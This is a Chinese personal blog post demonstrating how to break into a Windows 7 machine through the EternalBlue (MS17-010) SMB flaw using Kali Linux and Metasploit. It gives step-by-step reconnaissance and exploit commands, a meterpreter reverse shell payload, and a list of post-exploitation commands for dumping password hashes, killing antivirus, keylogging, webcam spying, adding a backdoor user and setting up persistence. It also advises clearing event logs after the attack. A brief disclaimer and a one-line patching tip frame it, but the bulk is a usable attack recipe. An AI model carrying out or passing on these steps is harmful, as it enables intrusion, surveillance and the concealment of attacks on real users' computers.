利用“永恒之蓝”漏洞进行Win7渗透的演示

RBI_GL · 2020-09-20 10:12:23 · 个人记录

本文仅供演示与讲解，因为滥用此漏洞而造成他人财产损失,本人一概不负责任。

“永恒之蓝” 漏洞，于数年前被黑客组织 “影子经纪人” 曝出，随后也催生了 Wannacry 勒索病毒等。微软已经在 ms17-010 补丁中修复了这个漏洞。Win7 是这个漏洞的重灾区（当然之前的 XP,Vista 等也有这个漏洞）。Win10 已经修复了这个漏洞，Win7 要开防火墙并且装补丁，SP1 和 SP2 都一样。

这个漏洞利用的是 445 端口，是 Windows 的 smb 功能中的漏洞。

话不多说，我们现在来复现这个漏洞。

准备工作：kali linux 一台（可以是虚拟机），Win7 一台（也可以是虚拟机，注意要关闭防火墙和杀软的）。注意两台机器要连到同一个网络。

第一步：打开终端，输入 ifconfig 。可以看到第二行有一个“ inet 192.168.0.115 ”，这是 kali 的内网 ip ，记录下它。

第二步：执行 sudo nbtscan -r kali的ip/24 ，注意把 kali的ip 换成上一步您得到的内网 ip ，得到以下结果（结果因人而异）。这是这个网络下的所有计算机，看看有没有你熟悉的名字呢。找到你要渗透的那台 Win7 ，记录下 IP。（当然你知道对方的内网 ip 就可以跳过这一步）。我们这次来渗透“ERIC-PC”。它的内网 IP 是 192.168.0.116 。

第三步：输入 nmap -sS -sV -Pn Win7的ip ，注意把 “ Win7的ip ” 换成上一步您得到的 Win7 内网 IP，得到以下结果。注意此操作要等待一段时间。最终报告中可以看到 445 端口是 open 的，说明很大概率是能够攻击成功的。

第四步：输入 msfconsole 。启动需要几秒。每次启动图案都不一样，不用担心。显示 "msf5" 或 "msf6" 等则表明启动成功。

第五步：输入 use auxiliary/scanner/smb/smb_ms17_010

第六步：输入 set RHOSTS win7的ip

第七步：输入 run ，出现 Host is likely vulnerable to MS17-010 即表示基本是可以入侵成功的。

第八步：输入 use exploit/windows/smb/ms17_010_eternalblue

第九步：输入 set RHOST win7的ip ，输入 set LHOST kali的ip ，输入 set payload windows/x64/meterpreter/reverse_tcp 。

第十步：输入 run

最后，出现 =======WIN======= 即表示成功入侵。输入 shell 进入 Windows 命令行。然后我们就可以”为所欲为“。（此时我们获得的是SYSTEM权限，比管理员权限还高哦！)

接下来放几张图来展示成果吧。

（创建了一个文件夹）

（显示了一个对话框）

（杀死了资源管理器）

当然我们也可以不输入 shell ，这里还有其他选项：

sysinfo             #查看目标主机系统信息
run scraper         #查看目标主机详细信息
run hashdump        #导出密码的哈希
load kiwi           #加载
ps                  #查看目标主机进程信息
pwd                 #查看目标当前目录(windows)
getlwd              #查看目标当前目录(Linux)
search -f *.jsp -d e:\                #搜索E盘中所有以.jsp为后缀的文件
download  e:\test.txt  /root          #将目标机的e:\test.txt文件下载到/root目录下
upload    /root/test.txt d:\test      #将/root/test.txt上传到目标机的 d:\test\ 目录下getpid              #查看当前Meterpreter Shell的进程
PIDmigrate 1384     #将当前Meterpreter Shell的进程迁移到PID为1384的进程上
idletime            #查看主机运行时间
getuid              #查看获取的当前权限
getsystem           #提权
run  killav         #关闭杀毒软件
screenshot          #截图
webcam_list         #查看目标主机的摄像头
webcam_snap         #拍照
webcam_stream       #开视频
execute  参数  -f 可执行文件   #执行可执行程序
run getgui -u hack -p 123    #创建hack用户，密码为123
run getgui -e                #开启远程桌面
keyscan_start                #开启键盘记录功能
keyscan_dump                 #显示捕捉到的键盘记录信息
keyscan_stop                 #停止键盘记录功能
uictl  disable  keyboard     #禁止目标使用键盘
uictl  enable   keyboard     #允许目标使用键盘
uictl  disable  mouse        #禁止目标使用鼠标
uictl  enable   mouse        #允许目标使用鼠标
load                         #使用扩展库
run                          #使用扩展库
run persistence -X -i 5 -p 8888 -r 192.168.10.27        #反弹时间间隔是5s 会自动连接
                                   192.168.27的4444端口，缺点是容易被杀毒软件查杀
portfwd add -l 3389 -r 192.168.11.13 -p 3389     #将192.168.11.13的3389端口转发到本地的3389端口上，这里的192.168.11.13是获取权限的主机的ip地址
clearev                       #清除日志

建议在结束攻击后运行 clearev 。

演示到这里就结束了，有没有感觉即惊讶又害怕？

如何避免该漏洞：开防火墙，多打补丁。做了这些，你就不用怕中招。